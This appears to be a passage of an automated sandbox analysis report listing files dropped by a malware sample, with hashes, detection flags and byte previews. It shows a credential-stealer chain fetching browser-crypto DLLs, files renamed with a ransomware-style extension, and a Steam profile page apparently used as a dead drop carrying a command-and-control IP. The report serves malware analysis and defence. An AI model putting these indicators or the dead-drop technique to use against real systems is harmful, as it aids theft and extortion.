Preview:	S.../...+.{}mPiO]..\WF.C.'/l..<s.%{)+.... .;..h..\G...y"P.\.B....w...h...X....w.E7`P.3...q..67.?....E.$.....dl\|....Yw.p.b...P.....%\zc..%.......X...Zn.5.:26;A....U/.Y...,.a}.I.......1..p.S,#.Y.t. ..*.a..;\_..F....H...le..M".t?..}.5..3.Ei......R.4PH...g.....j\|;...;g_+z0..5....<.A3J,.:.B.H.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	388
Entropy (8bit):	7.291388867211743
Encrypted:	false
SSDEEP:	12:DRw1SgfsI4bSN4C2aWPcm2E9W3MJNAwoqw1cii9a:d8Sg9ZmNKE9MMX9w1bD
MD5:	9A3F26E5C06099CA89DFA34FB5F2692E
SHA1:	AE3DB3173A9F48986BC6DC6EDDA88113850DC8D1
SHA-256:	5FE8A6379D2B131B3CF22088688B3E537F0D5B1A8608480BFCF868B6C85C06FE
SHA-512:	90E677944F50CC2BCD776123D55C9AF31A55CF4641F7591862BC00436A8FB459C78FDFF19DCC46AE890B305B965B1FDF938FB54EE6D5AE3255B0F47EB515B564
Malicious:	false
Preview:	S.../...+.{}mPiO]..\WF.C.'/l..<s.%{)+.... .;..h..\G...y"P.\.B....w...h...X....w.E7`P.3...q..67.?....E.$.....dl\|....Yw.p.b...P.....%\zc..%.......X...Zn.5.:26;A....U/.Y...,.a}.I.......1..p.S,#.Y.t. ..*.a..;\_..F....H...le..M".t?..}.5..3.Ei......R.4PH...g.....j\|;...;g_+z0..5....<.A3J,.:.B.H.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	460
Entropy (8bit):	7.499302315739785
Encrypted:	false
SSDEEP:	12:GHG1iz6DoaJtgmC23IQIgA8NgnReOcaeoqw1cii9a:GHGrxTgcA7sOcpw1bD
MD5:	3F55350CB952AEB5ED062519AFC22091
SHA1:	2E80CD2D3175104A2C6E2D3FFDDFFD0863950C6E
SHA-256:	A67443D77DAE4630C6D089C8DCA10BDFBBD497FAB75FECC23E75FF7AC522AD88
SHA-512:	A845749B93CD7040E58FC8E88E9971C4D380094E4624B7EFC59EFA1CB6B60DE6EF926EA77540D480B1C8739BDEDAEE08B98AD5005F43C87AA9F0058AD5BDE3CA
Malicious:	false
Preview:	.h.6.v5A..K.].em...#{0....i}n..k.......sC..7r........\|.'..5..x.J.......S.v,P...8.....?D.e.;..=..[.A......X..@.Tp.D.9l....A........_Om(..M.+.C....+....................j...u3..h..=..P.<..\n.$...a9...Z......p1.....h.\|J7....U...uZ...Y..:E~7.....J.Uk@.....\..X.)*7M.F`O...-..:...3.j6/'+.q.,......}w..CQ...f.k.Q(.&~.......R....~..n....b.D=?t`'..S.s....&...}._..TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	460
Entropy (8bit):	7.499302315739785
Encrypted:	false
SSDEEP:	12:GHG1iz6DoaJtgmC23IQIgA8NgnReOcaeoqw1cii9a:GHGrxTgcA7sOcpw1bD
MD5:	3F55350CB952AEB5ED062519AFC22091
SHA1:	2E80CD2D3175104A2C6E2D3FFDDFFD0863950C6E
SHA-256:	A67443D77DAE4630C6D089C8DCA10BDFBBD497FAB75FECC23E75FF7AC522AD88
SHA-512:	A845749B93CD7040E58FC8E88E9971C4D380094E4624B7EFC59EFA1CB6B60DE6EF926EA77540D480B1C8739BDEDAEE08B98AD5005F43C87AA9F0058AD5BDE3CA
Malicious:	false
Preview:	.h.6.v5A..K.].em...#{0....i}n..k.......sC..7r........\|.'..5..x.J.......S.v,P...8.....?D.e.;..=..[.A......X..@.Tp.D.9l....A........_Om(..M.+.C....+....................j...u3..h..=..P.<..\n.$...a9...Z......p1.....h.\|J7....U...uZ...Y..:E~7.....J.Uk@.....\..X.)*7M.F`O...-..:...3.j6/'+.q.,......}w..CQ...f.k.Q(.&~.......R....~..n....b.D=?t`'..S.s....&...}._..TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	734208
Entropy (8bit):	7.698390549116104
Encrypted:	false
SSDEEP:	12288:tYX3deNL5bGRk2f5bKhgUAtnqfbDhbB0ij0TCAvS3l4yT5p:tYn4d56mUHVtnq9yiOhaTf
MD5:	B925392616A0AD9C3FCDE0F5BD7EF7A1
SHA1:	C0307516EDEA4D349162FACBF08464CB38836EAD
SHA-256:	4222815C695EE01A35F8AF4078BD7EDF7446823D6B108A7DF9BF9CDDC28DBC93
SHA-512:	F688FF1ACDF5E0F97978A3CA800E5F5655C0BB93B2AEA4893A4C4B841E76453F55104E59C6774C650D7043AEBD3CC89812CD157D4FF90B87590E7D6C5069031F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................".......#......................'.....................Rich....................PE..L.....3d.....................l}......"............@...........................}..............................................v..<.... }..............................................................m..@...............\|............................text.............................. ..`.rdata..............................@..@.data....r......(...t..............@....rsrc........ }.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	326144
Entropy (8bit):	6.708005961678636
Encrypted:	false
SSDEEP:	3072:/3JSIGTU9QsLn+7OqUHLkwnCZOzR6JjimxjG7/rEIN99BcJeX92Ok4CBTI/3G:/uGQMkCSwzwhim6EaSeX92O1CBT4
MD5:	4FBDCB0EE049B71CB8B9A68BF69F9E0E
SHA1:	7E36A91700E0A7A8B3A3319CC4B93A1656447096
SHA-256:	31084ADB877EF9BCF2143FA2D60CE8860D15AF325424B709AD115FEBE8B96E81
SHA-512:	19AEFF14CC2D1C60E99228B089F8C76ED5D7C7ED95EF3ADB639B899C258C4CB17982D6DE4294506C53DEDBBF771F9F26E99094D22D1D05542D3CF86A6B24D283
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...w..e......................E......=....... ....@...........................F.......................................................E.rQ..........................."..8........................... ...@............ ...............................text............................... ..`.rdata...u... ...v..................@..@.data...`.C......&..................@....rsrc...rQ....E..R..................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	306688
Entropy (8bit):	6.7250330334577075
Encrypted:	false
SSDEEP:	6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
MD5:	41B883A061C95E9B9CB17D4CA50DE770
SHA1:	1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
SHA-256:	FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
SHA-512:	CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......\|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000014.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	107304
Entropy (8bit):	4.004979173311639
Encrypted:	false
SSDEEP:	768:NHVdMkkGUmZoWWgjk0Bi4oQvVpN5L0RCj5MMsPquqR1v0nDYhwkmDypqm34hh8if:mkymZod4oQvJ+Bh8igGonDhUFrXKP0
MD5:	0C91D2C577EF0D3C2CB5363F6AAA09ED
SHA1:	B01DFC5CFD9B55DAE0FA8CAF8C225D65B8A4E548
SHA-256:	6CB5E61D45D6E49594459393B286A4A2896298F8C0AE76851951DEE599BDE174
SHA-512:	9546A9282675457847216DEBDCBA9302F21EC20307E53FB29220B3E3E4C569C2EF81B3E7ECBC4337FFA5845E11343A5B67CB144669CC84DB271431E395DFE548
Malicious:	false
Preview:	....h... ...(..........P..............X...P...]........... ..........V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k..

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	107304
Entropy (8bit):	4.005262017830969
Encrypted:	false
SSDEEP:	768:N5Vd+k/GUmZoWWgjk0Bi4oQvVpN5L0RCj5MMsPquqR1v0nDYhwkmDypqm34hh8iv:+kbmZod4oQvJ+Bh8igGonDhUFrXKPU
MD5:	A0F53157C742074FB090BCEEA143C759
SHA1:	04357FE813D441082E36DB844189FB692748B6CD
SHA-256:	859B1D92F91C8A350BA203C96F172928E7A783E28AECF7125BD991E65A745FDB
SHA-512:	27A866A5F98EB4F04E098ABA8974C36CD6208DA4CCCFB2A68CA32D2487F1A3D0347E9C83C6ACD5C23251F3CA1384C310951A6F9794DD29F586BC5DFC881CBC93
Malicious:	false
Preview:	....h... ...(..........P..............X...P...]........... ..........V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\Windows[2].json

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	619
Entropy (8bit):	5.1114061724184445
Encrypted:	false
SSDEEP:	12:YWgc2Th8H+9QL19vmXeH+2yrZMAdrKCw8kEUq1HLxycXNNZW3c3Z:Yzc2TOHdPueHt0drtUET
MD5:	A1C1084682B806EB2204D5F56936E416
SHA1:	57F9D8E223420B9BB4059C29C1606D4E0E02FD5E
SHA-256:	31CA87FBB9E59DF4BED0A8CB0797D69D0A7F61DDB0F17966C8C8847F9AF4DBB5
SHA-512:	EBABC8D2B773F36BF037F1B2ED71066C72F7E053F00EE698E9986F0FD23A09E29E9730413DBF3042AC7AACC7777D58AECC3DF80FFA1A3C545A3BBCB7594712D8
Malicious:	false
Preview:	{"serviceContext":{"serviceActivityId":"660ecc0a-b393-4fea-9d4f-b3efd7b32de9","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"660ecc0a-b393-4fea-9d4f-b3efd7b32de9\|2024-04-04T15:49:30.9286318Z\|fabric_msn\|ESU\|News_578"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"webView2Enabled":false,"webView2EnabledV1":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false},"isPartial":false}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\sqln[1].dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\76561199662282318[1].htm

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33790
Entropy (8bit):	5.435213469048532
Encrypted:	false
SSDEEP:	768:+dpqm+0Im3YAA9CWG0ofcDA3Z4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKh2So:+d8m+0Im3YAA9CWG0oF3Z4VWBCW3KI8S
MD5:	4F543E1DB0E94D12CE4FED042090D1BA
SHA1:	1988C5C53AA4B4BE07709EDE6D3E7B6FF87E552B
SHA-256:	236EE8A4E28D03760B286B7F8C7CCC7DD6B157916419EE81A1FDFFEEFBC31A3F
SHA-512:	B8091EC890DF0A27FDE359AA9E01EA5691354AB915683624A8EB2A2AFB825C37B5E470538AEBF3DCAA69E407ABF9C4BAE2CD51D571411FED051CB7BE49DF2C6C
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: i1il https://95.216.179.73\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=yEYKdqHaNBdl&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link hre

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	326144
Entropy (8bit):	6.708005961678636
Encrypted:	false
SSDEEP:	3072:/3JSIGTU9QsLn+7OqUHLkwnCZOzR6JjimxjG7/rEIN99BcJeX92Ok4CBTI/3G:/uGQMkCSwzwhim6EaSeX92O1CBT4
MD5:	4FBDCB0EE049B71CB8B9A68BF69F9E0E
SHA1:	7E36A91700E0A7A8B3A3319CC4B93A1656447096
SHA-256:	31084ADB877EF9BCF2143FA2D60CE8860D15AF325424B709AD115FEBE8B96E81
SHA-512:	19AEFF14CC2D1C60E99228B089F8C76ED5D7C7ED95EF3ADB639B899C258C4CB17982D6DE4294506C53DEDBBF771F9F26E99094D22D1D05542D3CF86A6B24D283
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...w..e......................E......=....... ....@...........................F.......................................................E.rQ..........................."..8........................... ...@............ ...............................text............................... ..`.rdata...u... ...v..................@..@.data...`.C......&..................@....rsrc...rQ....E..R..................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build3[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	306688
Entropy (8bit):	6.7250330334577075
Encrypted:	false
SSDEEP:	6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
MD5:	41B883A061C95E9B9CB17D4CA50DE770
SHA1:	1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
SHA-256:	FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
SHA-512:	CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......\|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\get[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	566
Entropy (8bit):	5.980175261909468
Encrypted:	false
SSDEEP:	12:YGJ68ZyQlviAceInMG7jndKEZk2TbPzLxpSPx5kboqw2:YgJwQlvi4a97jn62TbPXS5Ww2
MD5:	892068E92307E1635CD4B30625509D68
SHA1:	C6A7BB5AE63157867A8C08DCE91B43BDE2AE1B82
SHA-256:	E6132E73CC7A5E6A55890F0E4EF646881421A458D1732066767B8E0D79E90338
